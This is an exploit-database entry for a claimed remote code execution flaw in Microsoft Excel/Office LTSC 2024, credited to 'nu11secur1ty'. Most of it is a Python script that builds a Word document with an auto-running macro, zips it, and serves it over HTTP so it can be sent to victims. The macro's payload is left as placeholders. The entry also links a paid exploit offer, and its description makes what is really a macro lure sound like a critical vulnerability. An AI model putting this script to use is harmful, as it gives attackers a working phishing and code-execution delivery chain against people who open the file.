📄 Microsoft Excel LTSC 2024 Remote Code Execution

🗓️ 20 Jun 2025 00:00:00Reported by nu11secur1tyType

A malicious DOCX can execute code on opening, risking full machine compromise.

Reporter	Title	Published	Views	Family All 47
BDU FSTEC	The vulnerability of Microsoft 365 Apps for Enterprise and Office, related to the use of memory after it is freed, allows a perpetrator to execute arbitrary code.	11 Apr 202500:00	–	bdu_fstec
BDU FSTEC	The vulnerability of Microsoft Office package applications and Microsoft 365 Apps for Enterprise, related to memory usage after it is released, allows attackers to execute arbitrary code.	20 Jun 202500:00	–	bdu_fstec
Circl	CVE-2025-27751	8 Apr 202516:14	–	circl
Circl	CVE-2025-47957	10 Jun 202515:24	–	circl
CNNVD	Microsoft Office 资源管理错误漏洞	8 Apr 202500:00	–	cnnvd
CNNVD	Microsoft Word 资源管理错误漏洞	10 Jun 202500:00	–	cnnvd
CNVD	Microsoft Excel Code Execution Vulnerability (CNVD-2025-10609)	9 Apr 202500:00	–	cnvd
CNVD	Microsoft Word Code Execution Vulnerability (CNVD-2025-17474)	17 Jun 202500:00	–	cnvd
CVE	CVE-2025-27751	8 Apr 202517:23	–	cve
CVE	CVE-2025-47957	10 Jun 202517:02	–	cve

# Titles: Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)
    # Author: nu11secur1ty
    # Date: 06/16/2025
    # Vendor: Microsoft
    # Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
    # Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751
    # CVE-2025-47957
    # Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise 
    
    ## Description:
    The attacker can trick any user into opening and executing their code by
    sending a malicious DOCX file via email or a streaming server. After the
    execution of the victim, his machine can be infected or even worse than
    ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE
    MACROS OPTIONS FROM YOUR OFFICE 365!!!
    
    STATUS: HIGH-CRITICAL Vulnerability
    
    
    [+]Exploit:
    
    ```
    #!/usr/bin/python
    # CVE-2025-47957 by nu11secur1ty
    import os
    import time
    import zipfile
    import threading
    import http.server
    import socket
    import socketserver
    import win32com.client
    
    def get_local_ip():
        """Get the LAN IP address of the current machine."""
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.connect(("8.8.8.8", 80))  # External DNS, just for routing
            ip = s.getsockname()[0]
            s.close()
            return ip
        except:
            return "127.0.0.1"
    
    def create_docm_with_auto_macro(filename):
        script_dir = os.path.dirname(os.path.abspath(__file__))
        full_path = os.path.join(script_dir, filename)
    
        word = win32com.client.Dispatch("Word.Application")
        word.Visible = False
        doc = word.Documents.Add()
    
        doc.Content.Text = "This document contains an auto-starting macro."
    
        vbproject = doc.VBProject
        vbcomponent = vbproject.VBComponents.Add(1)  # Standard Module
    
        macro_code = '''
    Sub AutoOpen()
        Call YOUR_PoC
    End Sub
    
    Sub YOUR_PoC()
        Dim Program As String
        Dim TaskID As Double
        On Error Resume Next
        Program = "YOUR_EXPLOIT_HERE"
        TaskID = YOUR_TASK_HERE
        If Err <> 0 Then
            MsgBox "Can't start " & Program
        End If
    End Sub
    '''
        vbcomponent.CodeModule.AddFromString(macro_code)
    
        wdFormatXMLDocumentMacroEnabled = 13
        doc.SaveAs(full_path, FileFormat=wdFormatXMLDocumentMacroEnabled)
        doc.Close()
        word.Quit()
    
        print(f"[+] Macro-enabled .docm saved at: {full_path}")
        return full_path
    
    def compress_to_zip(filepath):
        zip_path = filepath + '.zip'
        with zipfile.ZipFile(zip_path, 'w') as zipf:
            zipf.write(filepath, arcname=os.path.basename(filepath))
        print(f"[+] Compressed to ZIP: {zip_path}")
        return zip_path
    
    def start_http_server(directory, port=8000):
        os.chdir(directory)
        handler = http.server.SimpleHTTPRequestHandler
        httpd = socketserver.TCPServer(("", port), handler)
        ip = get_local_ip()
        print(f"[+] HTTP server running at: http://{ip}:{port}/")
    
        thread = threading.Thread(target=httpd.serve_forever)
        thread.daemon = True
        thread.start()
        return httpd
    
    if __name__ == "__main__":
        filename = "CVE-2025-47957.docm"
        docm_path = create_docm_with_auto_macro(filename)
        zip_path = compress_to_zip(docm_path)
        server = start_http_server(os.path.dirname(docm_path))
    
        try:
            print("[*] Server running — press Ctrl+C to stop...")
            while True:
                time.sleep(1)
        except KeyboardInterrupt:
            print("\n[!] Ctrl+C detected — shutting down server...")
            server.shutdown()
            print("[+] The Exploit Server stopped. Goodbye!")
    
    ```
    
    # Reproduce:
    [href](https://www.youtube.com/watch?v=r4NsGrO56yo)
    
    # Buy an exploit only:
    [href](https://satoshidisk.com/pay/COeJqt)
    
    # Time spent:
    01:37:00

20 Jun 2025 00:00Current

8.9High risk

Vulners AI Score8.9

CVSS 3.18.4

EPSS0.01498

SSVC